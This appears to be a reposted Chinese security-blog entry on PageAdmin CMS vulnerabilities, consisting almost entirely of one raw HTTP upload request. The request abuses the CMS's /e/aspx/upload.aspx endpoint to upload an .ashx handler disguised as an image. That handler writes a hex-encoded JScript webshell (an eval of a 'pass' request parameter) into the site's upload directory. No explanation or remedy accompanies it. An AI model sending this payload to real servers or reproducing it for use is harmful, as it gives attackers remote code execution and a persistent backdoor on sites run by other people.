Pageadmin漏洞合集
2020-06-29 19:48:42 Author: www.safeinfo.me(查看原文) 阅读量:687 收藏 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
POST /e/aspx/upload.aspx HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzBItOAbA8GrZ7s49
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.9 Safari/537.36
Cookie: ASP.NET_SessionId=c53k11452napjc45ibfuaw55
Referer: http://www.0-sec.org/e/aspx/upload_p ... pic&from=master
Host: www.0-sec.org
Content-Length: 2318


------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="file"; filename="005.ashx"
Content-Type: image/jpeg

<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
using System.IO;


public class Handler : IHttpHandler
{
    public bool IsReusable
    {
        get
        {
            return false;
        }
    }
    public void ProcessRequest(HttpContext context)
    {
        byte[] b={0x3C, 0x25, 0x40, 0x20, 0x50, 0x61, 0x67, 0x65, 0x20, 0x4C, 0x61, 0x6E, 0x67, 0x75, 0x61, 0x67, 0x65, 0x3D, 0x22, 0x4A, 0x73, 0x63, 0x72, 0x69, 0x70, 0x74, 0x22, 0x25, 0x3E, 0x3C, 0x25, 0x65, 0x76, 0x61, 0x6C, 0x28, 0x52, 0x65, 0x71, 0x75, 0x65, 0x73, 0x74, 0x2E, 0x49, 0x74, 0x65, 0x6D, 0x5B, 0x22, 0x70, 0x61, 0x73, 0x73, 0x22, 0x5D, 0x2C, 0x22, 0x75, 0x6E, 0x73, 0x61, 0x66, 0x65, 0x22, 0x29, 0x3B, 0x25, 0x3E};
        try
        {
            File.WriteAllBytes(context.Server.MapPath("/e/upload/s1/article/file/")+"/file.aspx",b);
            context.Response.Write("oooooooookkkkkkkkk");
        }
        catch(Exception ex)
        {
            context.Response.Write(ex.Message);
        }
        context.Response.End();
    }
}
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="width"

400
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="height"

400
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="url"


------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="filesize"

0
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="username"

admin
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="sid"

1
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="type"

file
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="table"

article
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="field"

titlepic
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="from"

master
------WebKitFormBoundaryzBItOAbA8GrZ7s49
Content-Disposition: form-data; name="submit"

1
------WebKitFormBoundaryzBItOAbA8GrZ7s49--

文章来源: https://www.safeinfo.me/2020/06/29/Pageadmin%E6%BC%8F%E6%B4%9E%E5%90%88%E9%9B%86.html
如有侵权请联系:admin#unsafe.sh